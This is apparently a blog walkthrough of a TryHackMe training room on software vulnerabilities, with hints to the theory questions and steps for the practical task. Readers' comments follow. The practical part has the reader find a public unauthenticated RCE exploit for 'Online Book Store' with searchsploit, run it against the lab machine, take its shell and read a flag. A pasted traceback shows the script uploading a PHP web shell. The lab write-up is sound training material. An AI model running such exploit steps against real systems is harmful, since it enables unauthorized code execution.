The Exploit Vulnerabilities/CMNatic Bookstore is the second room in a series of three done by cmnatic (https://tryhackme.com/p/cmnatic) to teach people about software vulnerabilities. The first four tasks are theory questions but the last task does involve doing some manual exploitation of a vulnerable machine.
The room is available at https://tryhackme.com/room/exploitingavulnerabilityv2
Question 1: Start the machine
Question 2: Would you use an automated scanner? (Yay/Nay)
Question 2 Answer: Hint – Which is faster
Question 3: What vulnerability is this?
Question 3 Answer: Hint – You would need to input harmful code.
Question 4: You manage to impersonate another user. What vulnerability is this?
Question 4 Answer: Hint – Look at the table of different vulnerabilities.
Question 5: What website would you use as a security researcher if you wanted to upload a Proof of Concept?
Question 5 Answer: Hint – Very popular code hosting site owned by Microsoft
Question 6: You are performing a penetration test at a site with no internet connection. What tool could you use to find exploits to use?
Question 6 Answer: Hint – offline tool installed on Kali Linux
Question 7: What type of vulnerability was used in this attack?
Question 7 Answer: – Hint – Acronym is RCE
Question 8: Find out the version of the application that is running. What are the name and version number of the application?
Question 8 Answer: Hint – Look at the bottom Right Hand Side of the Page
Question 9: Use this exploit against the vulnerable machine. What is the value of the flag located in a web directory?
This is where the theory stops and the practical begins
Run the following command:
searchsploit Online Book Store
Or you can use Exploit Database (https://www.exploit-db.com) and search for Online Book Store. There are several options but the Unauthenticated Remote Code Execution exploit is the best option.
Download/copy the python file to your home directory. Then run the following command:
python3 47887.py http://x.x.x.x/
Obviously change x.x.x.x to the IP address of the machine.
Answer y when the script asks if: Do you wish to launch a shell here?
The exploit will launch a shell which looks like this: RCE
Change directory to /var/www/html/bootstrap/img
Then just look for the flag.txt and view it – Paste the contents into the last question and you are done
hello i tried that but i got this error and i can’t solve the room. Can u help me plz.
python 47887.py 10.10.51.246
> Attempting to upload PHP web shell…
Traceback (most recent call last):
File “47887.py”, line 28, in
r = requests.post(url + ‘/admin_add.php’, files=file, data={‘add’:’1′}, verify=False)
File “/usr/lib/python3/dist-packages/requests/api.py”, line 112, in post
return request(‘post’, url, data=data, json=json, **kwargs)
File “/usr/lib/python3/dist-packages/requests/api.py”, line 58, in request
return session.request(method=method, url=url, **kwargs)
File “/usr/lib/python3/dist-packages/requests/sessions.py”, line 506, in request
prep = self.prepare_request(req)
File “/usr/lib/python3/dist-packages/requests/sessions.py”, line 449, in prepare_request
hooks=merge_hooks(request.hooks, self.hooks),
File “/usr/lib/python3/dist-packages/requests/models.py”, line 305, in prepare
self.prepare_url(url, params)
File “/usr/lib/python3/dist-packages/requests/models.py”, line 379, in prepare_url
raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL ‘10.10.51.246/admin_add.php’: No schema supplied. Perhaps you meant http://10.10.51.246/admin_add.php?
LikeLike
no need help i am retarded i didn’t used the http:// LMAO sorry
LikeLike
How did you solved last challenge: It has error on exploit py file. Can you post solution with this blog.
LikeLike